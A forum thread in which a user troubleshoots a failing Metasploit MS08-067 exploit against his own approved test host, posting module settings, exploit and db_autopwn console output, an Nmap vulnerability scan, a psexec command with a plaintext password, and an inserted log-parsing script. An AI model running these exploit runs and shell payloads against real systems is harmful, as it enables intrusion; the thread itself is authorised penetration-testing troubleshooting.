Question when exploiting target via Metasploit ms08_067_netapi

    • #4500
      raymond hua
      Participant

      My test target is 9.181.147.90. When I had set the settings and began to exploit, the error information below appeared: Exploit failed: Connection reset by peer.
      After the first attempt, I tried to exploit it again. Then the error information was: Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      At the same time, port 445 was closed.

      msf exploit(ms08_067_netapi) > set payload generic/shell/bind_tcp
      [-] The value specified for payload is not valid.
      msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
      payload => generic/shell_bind_tcp
      msf exploit(ms08_067_netapi) > set

      Global
      ======

      No entries in data store.

      Module: windows/smb/ms08_067_netapi
      ===================================

        Name                            Value
        ----                            -----

        ConnectTimeout                  10
        DCERPC::ReadTimeout              0
        DCERPC::fake_bind_multi          true
        DCERPC::fake_bind_multi_append  0
        DCERPC::fake_bind_multi_prepend  0
        DCERPC::max_frag_size            4096
        DCERPC::smb_pipeio              rw
        DisablePayloadHandler            false
        EXITFUNC                        thread
        EnableContextEncoding            false
        RPORT                            445
        SMB::obscure_trans_pipe_level    0
        SMB::pad_data_level              0
        SMB::pad_file_level              0
        SMB::pipe_evasion                false
        SMB::pipe_read_max_size          1024
        SMB::pipe_read_min_size          1
        SMB::pipe_write_max_size        1024
        SMB::pipe_write_min_size        1
        SMBDirect                        true
        SMBDomain                        WORKGROUP
        SMBName                          *SMBSERVER
        SMBPIPE                          BROWSER
        SMBPass                         
        SMBUser                         
        SSL                              false
        SSLVersion                      SSL3
        TCP::max_send_size              0
        TCP::send_delay                  0
        WfsDelay                        0
        lhost                            9.181.73.46
        payload                          generic/shell_bind_tcp
        rhost                            9.181.147.90
        target                          0

      msf exploit(ms08_067_netapi) > exploit

      [*] Started bind handler
      [*] Automatically detecting the target…
      [*] Fingerprint: Windows XP Service Pack 2 – lang:Chinese – Traditional
      [*] Selected Target: Windows XP SP2 Chinese – Traditional (NX)
      [*] Triggering the vulnerability…
      [-] Exploit failed: Connection reset by peer
      [*] Exploit completed, but no session was created.

      Then I used another way: I let Metasploit run the exploits automatically via the command db_autopwn -p -t -e. The results are below; the exploitation stopped at "Started bind handler" for a long time, and in the end the attempt failed.

      msf > db_autopwn -p -t -e
      [*] Analysis completed in 8.35199999809265 seconds (0 vulns / 0 refs)
      [*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139…
      [*] (3/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:445…
      [*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139…
      [*] (4/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:139…
      [*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445…
      [*] (5/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:445…
      [*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445…
      [*] (6/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:139…
      [*] Matched exploit/osx/email/mailapp_image_exec against 9.181.147.90:25…
      [*] Matched exploit/osx/email/mobilemail_libtiff against 9.181.147.90:25…
      [*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] (9/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] (10/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:139…
      [*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139…
      [*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139…
      [*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445…
      [*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139…
      [*] (15/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:445…
      [*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139…
      [*] (16/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:139…
      [*] Matched exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25…
      [*] (17/104): Launching exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25…
      [*] Matched exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25…
      [*] (18/104): Launching exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25…

      [-] Exploit failed: The following options failed to validate: MAILTO.
      [*] Matched exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967…
      [*] (19/104): Launching exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967…
      [*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445…
      [*] (20/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445…
      [*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445…
      [*] (21/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:139…
      [*] Matched exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135…
      [*] (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135…
      [*] Started bind handler
      [*] Connecting to SMTP server 9.181.147.90:25…
      [*] Started bind handler
      [*] Started bind handler
      [*] Matched exploit/windows/email/ani_loadimage_chunksize against 9.181.147.90:25…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connected to target SMTP server.
      [*] Banner: 220 9.181.147.90 Simple Mail Transfer Service Ready
      [*] Started bind handler
      [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
      [*] Started bind handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] …
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] …
      [*] Sending exploit …
      [-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
      [*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445…
      [*] (24/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445…
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445…
      [*] (25/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:139…
      [*] Started bind handler
      [*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445…
      [*] (28/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445…
      [*] (29/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:139…
      [*] Started bind handler
      [-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
      [*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] (30/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [*] Started bind handler
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (31/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:2967).
      [*] (32/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (33/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445…
      [*] (38/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (39/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection timed out (9.181.147.90:445).
      [*] (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445…
      [-] Exploit failed: can’t convert nil into Integer
      [*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445…
      [*] (41/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:139…
      [-] Exploit failed: can’t convert nil into Integer
      [*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445…
      [*] (42/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (43/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Connecting to the SMB service…
      [*] Started bind handler
      [-] Exploit failed: The connection timed out (9.181.147.90:139).
      [*] (44/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445…
      [*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler
      [-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
      [*] (45/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:139…
      [*] Matched exploit/windows/smb/msdns_zonename against 9.181.147.90:445…
      [*] Job limit reached, waiting on modules to finish…
      [*] Started bind handler

      I would appreciate it if anyone can help me, thanks!
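The db_autopwn output above interleaves launches and failures from many concurrent jobs, which makes it hard to see the one signal that matters in this thread: ports that Nmap reported open but that refuse or reset connections after an attempt, i.e. a listening service that has gone down. The following triage script is an added example, not part of the original post or of Metasploit; it parses msfconsole lines in the format quoted above and groups failures by cause. The sample log is constructed (IP replaced with a documentation address) and the category names are my own.

```python
import re
from collections import Counter, defaultdict

# Line formats as printed by the msfconsole output quoted in the thread.
LAUNCH_RE = re.compile(r"\[\*\] \((\d+)/(\d+)\): Launching (\S+) against ([\d.]+):(\d+)")
# Reason text, then an optional trailing "(ip:port)" and an optional final period.
FAIL_RE = re.compile(r"\[-\] Exploit failed: (.*?)(?: \(([\d.]+):(\d+)\))?\.?$")

# Constructed sample modelled on the post's db_autopwn log (not the real capture).
SAMPLE_LOG = """\
[*] (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.0.2.10:135...
[*] Started bind handler
[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
[*] (24/104): Launching exploit/windows/smb/ms03_049_netapi against 192.0.2.10:445...
[-] Exploit failed: The connection was refused by the remote host (192.0.2.10:445).
[*] (29/104): Launching exploit/windows/smb/ms04_011_lsass against 192.0.2.10:139...
[-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
[*] (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 192.0.2.10:445...
[-] Exploit failed: can't convert nil into Integer
[*] (44/104): Launching exploit/windows/smb/ms08_067_netapi against 192.0.2.10:445...
[*] Started bind handler
[-] Exploit failed: The connection timed out (192.0.2.10:139).
[-] Exploit failed: The connection was refused by the remote host (192.0.2.10:445).
"""

def classify(reason):
    """Map a failure reason to a triage category (category names are assumed here)."""
    r = reason.lower()
    if "refused" in r or "reset by peer" in r:
        return "service_down"      # nothing listening any more: the service likely crashed
    if "timed out" in r:
        return "timeout"
    if "login failed" in r or "access_denied" in r:
        return "auth_rejected"     # target answered but rejected the request
    if "failed to validate" in r or "convert nil" in r:
        return "module_config"     # module/option problem on the attacker side, not the target
    return "other"

def summarize(log_text):
    """Return launched modules per port, failure counts per category, and ports seen refusing."""
    launched = defaultdict(list)
    categories, down_ports = Counter(), set()
    for line in log_text.splitlines():
        line = line.strip()
        m = LAUNCH_RE.match(line)
        if m:
            launched[int(m.group(5))].append(m.group(3))
            continue
        m = FAIL_RE.match(line)
        if m:
            cat = classify(m.group(1))
            categories[cat] += 1
            if cat == "service_down" and m.group(3):
                down_ports.add(int(m.group(3)))
    return {"launched": dict(launched), "categories": categories, "down_ports": down_ports}

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(key, value)
```

A port in `down_ports` that Nmap listed as open before the run is the same symptom the poster saw on 445: the SMB server process stopped answering after the attempt, which is also what a host owner would notice as a service outage.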

    • #28198
      3PIL0GU3
      Participant

      Did you try using a Reverse TCP payload instead of a bind shell payload? You may have better luck.

    • #28199
      Ketchup
      Participant

      I sincerely hope you have permission to exploit that host. There could be an IPS or AntiVirus product stopping your exploit.

    • #28200
      raymond hua
      Participant

      To: 3PIL0GU3

      Following your suggestion, I tried again via windows/shell/reverse_tcp and windows/shell/reverse_tcp_allports. Unfortunately, it also failed.

      Global
      ======

      No entries in data store.

      Module: windows/smb/ms08_067_netapi
      ===================================

        Name                            Value
        ----                            -----

        ConnectTimeout                  10
        DCERPC::ReadTimeout              0
        DCERPC::fake_bind_multi          True
        DCERPC::fake_bind_multi_append  0
        DCERPC::fake_bind_multi_prepend  0
        DCERPC::max_frag_size            4096
        DCERPC::smb_pipeio              rw
        DisablePayloadHandler            false
        EXITFUNC                        thread
        EnableContextEncoding            false
        RPORT                            445
        SMB::obscure_trans_pipe_level    0
        SMB::pad_data_level              0
        SMB::pad_file_level              0
        SMB::pipe_evasion                False
        SMB::pipe_read_max_size          1024
        SMB::pipe_read_min_size          1
        SMB::pipe_write_max_size        1024
        SMB::pipe_write_min_size        1
        SMBDirect                        True
        SMBDomain                        WORKGROUP
        SMBName                          *SMBSERVER
        SMBPIPE                          BROWSER
        SMBPass                         
        SMBUser                         
        SSL                              false
        SSLVersion                      SSL3
        TCP::max_send_size              0
        TCP::send_delay                  0
        WfsDelay                        0
        lhost                            9.181.73.46
        payload                          windows/shell/reverse_tcp
        rhost                            9.181.147.90
        target                          0

      msf exploit(ms08_067_netapi) > exploit

      [*] Started reverse handler
      [*] Automatically detecting the target…
      [*] Fingerprint: Windows XP Service Pack 2 – lang:Chinese – Traditional
      [*] Selected Target: Windows XP SP2 Chinese – Traditional (NX)
      [*] Triggering the vulnerability…
      [-] Exploit failed: Connection reset by peer
      [*] Exploit completed, but no session was created.

      After the attempt, I used another shell to check port 445; it was closed. Before the attempt, port 445 was open. Maybe I should show my scan results from Nmap for your reference.

      Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-12-21 09:43 中国标准时间
      NSE: Script Scanning completed.
      Nmap scan report for 27119hua.cn.ibm.com (9.181.147.90)
      Host is up (0.00s latency).
      Not shown: 995 closed ports
      PORT     STATE SERVICE
      25/tcp   open  smtp
      135/tcp  open  msrpc
      139/tcp  open  netbios-ssn
      445/tcp  open  microsoft-ds
      3389/tcp open  ms-term-serv

      Host script results:
      |  smb-check-vulns:
      |    MS08-067: VULNERABLE
      |    Conficker: Likely CLEAN
      |    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
      |_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

    • #28201
      raymond hua
      Participant

      To Ketchup

      9.181.147.90 is owned by me and all the tests have been approved by my manager.
      I have uninstalled our firewall and I think there is no IPS in our internal network. But I do not know whether some limitation exists. For this case, I can access 9.181.147.90 via psexec and have administrator privileges.

      C:\>psexec \\9.181.147.90 -u hua -p basketball -e cmd.exe

      PsExec v1.91 - Execute processes remotely
      Copyright (C) 2001-2007 Mark Russinovich
      Sysinternals - http://www.sysinternals.com

      Microsoft Windows XP [版本 5.1.2600]
      (C) 版权所有 1985-2001 Microsoft Corp.

      C:\WINDOWS\system32>

      I sincerely hope for your reply!

    • #28202
      Anonymous
      Participant

      My guess is that the return is bad, or something like DEP is preventing code execution. Try manually setting the target.

Copyright ©2021 Caendra, Inc.